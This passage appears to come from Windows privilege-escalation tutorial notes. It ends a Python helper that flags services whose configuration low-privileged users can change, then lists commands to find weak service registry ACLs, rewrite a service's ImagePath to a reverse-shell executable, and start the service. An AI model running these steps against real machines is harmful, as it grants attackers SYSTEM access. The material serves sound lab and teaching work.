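    """(service, trustee, verdict) for every low-privileged trustee that can change config.

    'config-only' is the rabbit hole noted above: the binary path can be changed,
    but without SERVICE_START/SERVICE_STOP nothing runs it until something else restarts the service.
    """
    out = []
    for svc, sddl in sd_by_service.items():
        for who, info in assess(sddl).items():
            if info["can_change_config"]:
                out.append((svc, who, "config+restart" if info["can_restart"] else "config-only"))
    return out
```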
Weak Registry Permissions
The Windows registry stores entries for each service. Since registry entries can have ACLs, if the ACL is misconfigured, it may be possible to modify a service’s configuration even if we cannot modify the service directly.
Identifying weak registry permissions
Get-Acl HKLM:\System\CurrentControlSet\Services\regsvc | Format-List
.\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
Overwriting the ImagePath value to point at the reverse shell
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
Starting service
Start a listener on Kali and start the service on the target box:
net start <service>